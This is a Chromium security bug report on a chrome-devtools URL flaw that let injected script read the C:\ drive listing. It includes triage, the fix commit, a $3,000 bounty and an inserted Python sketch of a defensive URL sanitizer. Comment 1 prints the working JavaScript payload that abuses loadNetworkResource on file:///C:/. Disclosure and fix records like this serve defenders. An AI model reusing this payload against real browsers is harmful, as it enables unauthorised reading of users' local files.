
Issue metadata

Status: Fixed
Owner:
Closed: Oct 2016
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security




Issue 653134: Security: chrome-devtools protocol allows to read the content of C:\ drive

Reported by chromium...@gmail.com, Oct 5 2016

Issue description

VERSION
Chrome Version: 55.0.2880.4 canary (64-bit)
Operating System: Windows 7

REPRODUCTION CASE
1. Navigate to the link below.
2. As you can see the page displays the content of C:\ drive.
Attachments: devtools-link.txt (1.7 KB), Recording.mp4 (1022 KB)

Comment 1 by elawrence@chromium.org, Oct 5 2016

Components: Platform>DevTools
Summary: Security: chrome-devtools protocol allows to read the content of C:\ drive (was: Security: Devtools allows to read the content of C:\ drive)
The repro calls chrome-devtools://devtools/remote/serve_rev/@199588/devtools.html?eval(attackcode)

where attack code works out to be:
function f() {c='d="",DevToolsAPI.streamWrite=function(e,o){d+=o},DevToolsAPI.sendMessageToEmbedder("loadNetworkResource",["file:///C:/","",0],function(e){d.split("\\n").map(function(e){e.match(/addRow.*;/)&&document.write(e.match(/addRow.*;/)[0]);})});' ;document.write("<script>window.document.write('<script>'+c+'</scr'+'ipt>');</scr"+"ipt>");}if( typeof DevToolsHost == "undefined" ) location.reload();else f();

This would be interesting if the data in question could be leaked (e.g. instead of document.writing it in text, it instead sent it to a remote server via XHR).

Level of exploitability depends on whether or not Chrome is willing to navigate to such a link in markup or as the source of an IFRAME or whether the attacker needs to convince the user to navigate to it via the address bar.

Comment 2 by tsepez@chromium.org, Oct 5 2016

Labels: Security_Severity-Medium Security_Impact-Stable
Owner: dgozman@chromium.org
Status: Assigned (was: Unconfirmed)
Exfiltration seems likely, which would make this severity high.
But it appears to require navigation [It would be a bug in itself if web content could open devtools schemes], dropping to medium.

Comment 3 by mea...@chromium.org, Oct 5 2016

FWIW it's possible to navigate to chrome-devtools schemes from extensions. This means an extension with no permissions will be able to read disk contents.

Comment 4 by tsepez@chromium.org, Oct 5 2016

Labels: -Security_Severity-Medium Security_Severity-High OS-All

Comment 5 by tsepez@chromium.org, Oct 5 2016

Labels: M-53 Pri-1

Comment 6 by sheriffbot@chromium.org, Oct 13 2016

Project Member
Labels: -M-53 M-54

Comment 7 by chromium...@gmail.com, Oct 17 2016

Any updates on this bug?

Comment 8 by dgozman@chromium.org, Oct 17 2016

Status: Started (was: Assigned)
The patch is under review.

Comment 9 by bugdroid1@chromium.org, Oct 17 2016

Project Member

Comment 10 by bugdroid1@chromium.org, Oct 17 2016

Project Member

Comment 11 by chromium...@gmail.com, Oct 19 2016

Verified on 56.0.2894.0 (Windows). Fixed.

Comment 12 by dgozman@chromium.org, Oct 24 2016

Labels: M-55 Merge-Request-55
Looks like this didn't introduce regressions in canary for a week. Requesting merge to M55.

Comment 13 by dimu@chromium.org, Oct 24 2016

Labels: -Merge-Request-55 Merge-Approved-55 Hotlist-Merge-Approved
Your change meets the bar and is auto-approved for M55 (branch: 2883)

Comment 14 by sheriffbot@chromium.org, Oct 25 2016

Project Member
Status: Fixed (was: Started)
Please mark security bugs as fixed as soon as the fix lands, and before requesting merges. This update is based on the merge- labels applied to this issue. Please reopen if this update was incorrect.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 15 by bugdroid1@chromium.org, Oct 25 2016

Project Member
Labels: -merge-approved-55 merge-merged-2883
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/528c2bce2ece070826a84392d66169ffe33afdcd

commit 528c2bce2ece070826a84392d66169ffe33afdcd
Author: Dmitry Gozman <dgozman@chromium.org>
Date: Tue Oct 25 18:53:53 2016

Merge to 2883 "[DevTools] Move sanitize url to devtools_ui.cc."
> [DevTools] Move sanitize url to devtools_ui.cc.
>
> Compatibility script is not reliable enough.
>
> BUG= 653134 
>
> Review-Url: https://codereview.chromium.org/2403633002
> Cr-Commit-Position: refs/heads/master@{#425814}
(cherry picked from commit f865c2dfddb1d95af3a2467587c62566e3f7dfe4)
TBR=pfeldman

Review URL: https://codereview.chromium.org/2444423002 .

Cr-Commit-Position: refs/branch-heads/2883@{#289}
Cr-Branched-From: 614d31daee2f61b0180df403a8ad43f20b9f6dd7-refs/heads/master@{#423768}

[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/browser/devtools/devtools_window.cc
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/browser/ui/webui/devtools_ui.cc
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/browser/ui/webui/devtools_ui.h
[add] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/browser/ui/webui/devtools_ui_unittest.cc
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/test/BUILD.gn
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/content/renderer/devtools/devtools_client.cc
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/third_party/WebKit/Source/devtools/front_end/Runtime.js
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/third_party/WebKit/Source/devtools/front_end/devtools.js
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/third_party/WebKit/Source/devtools/front_end/screencast/ScreencastView.js
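The bug described in comment 1 comes down to the front-end accepting code carried in the query string of a remote DevTools URL, and the fix landed in comment 15 moves URL sanitization out of the front-end compatibility script into the browser side. The example below is added here and is not Chromium's code: it shows the shape of such a browser-side sanitizer in Python, with `ALLOWED_PARAMS` and `REMOTE_PATH` being assumptions chosen for the illustration rather than DevTools' real allowlists.

```python
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Assumed allowlist for this example: query parameters a remote DevTools
# front-end page may carry. Anything else, including a bare "eval(...)"
# token like the one in the report, is dropped rather than forwarded.
ALLOWED_PARAMS = {"ws", "experiments"}

# Only the remote front-end layout seen in the report is accepted:
# /remote/serve_rev/@<revision>/<page>.html. The character classes leave
# no room for "..", so path traversal cannot slip through either.
REMOTE_PATH = re.compile(r"^/remote/serve_rev/@[0-9A-Za-z]+/[A-Za-z0-9_-]+\.html$")


def sanitize_devtools_url(url: str):
    """Rebuild the URL from allowlisted pieces only; return None to refuse it.

    Rebuilding (instead of editing the original string) means every part of
    the result was explicitly permitted: scheme, host, path shape and each
    query key. The fragment is never carried over.
    """
    parts = urlsplit(url)
    if parts.scheme != "chrome-devtools" or parts.netloc != "devtools":
        return None
    if not REMOTE_PATH.match(parts.path):
        return None
    # keep_blank_values=True so a valueless token still surfaces as a key
    # and is then rejected by the allowlist instead of being silently kept.
    kept = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
            if k in ALLOWED_PARAMS]
    return urlunsplit((parts.scheme, parts.netloc, parts.path, urlencode(kept), ""))


if __name__ == "__main__":
    # Constructed sample input mirroring the report's URL shape.
    print(sanitize_devtools_url(
        "chrome-devtools://devtools/remote/serve_rev/@199588/devtools.html?eval(attackcode)"))
```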

Comment 16 by sheriffbot@chromium.org, Oct 26 2016

Project Member
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify

Comment 17 by awhalley@chromium.org, Oct 27 2016

Labels: reward-topanel

Comment 18 by bugdroid1@chromium.org, Oct 27 2016

Project Member
Labels: merge-merged-2840
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/528c2bce2ece070826a84392d66169ffe33afdcd

Comment 19 by dimu@google.com, Nov 4 2016

Labels: -merge-merged-2840
[Automated comment] removing mislabelled merge-merged-2840

Comment 20 by awhalley@chromium.org, Nov 7 2016

Labels: -Hotlist-Merge-Approved

Comment 21 by awhalley@chromium.org, Nov 7 2016

Labels: -reward-topanel reward-unpaid reward-3000

Comment 22 by awhalley@chromium.org, Nov 7 2016

Congratulations, the panel awarded $3,000 for this report!

Comment 23 by awhalley@chromium.org, Nov 7 2016

Labels: -reward-unpaid reward-inprocess

Comment 24 by awhalley@chromium.org, Nov 29 2016

Labels: Release-0-M55

Comment 25 by awhalley@chromium.org, Jan 4 2017

Labels: CVE-2016-5212

Comment 26 by sheriffbot@chromium.org, Jan 31 2017

Project Member
Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 27 by awhalley@chromium.org, Apr 25 2018

Labels: CVE_description-submitted
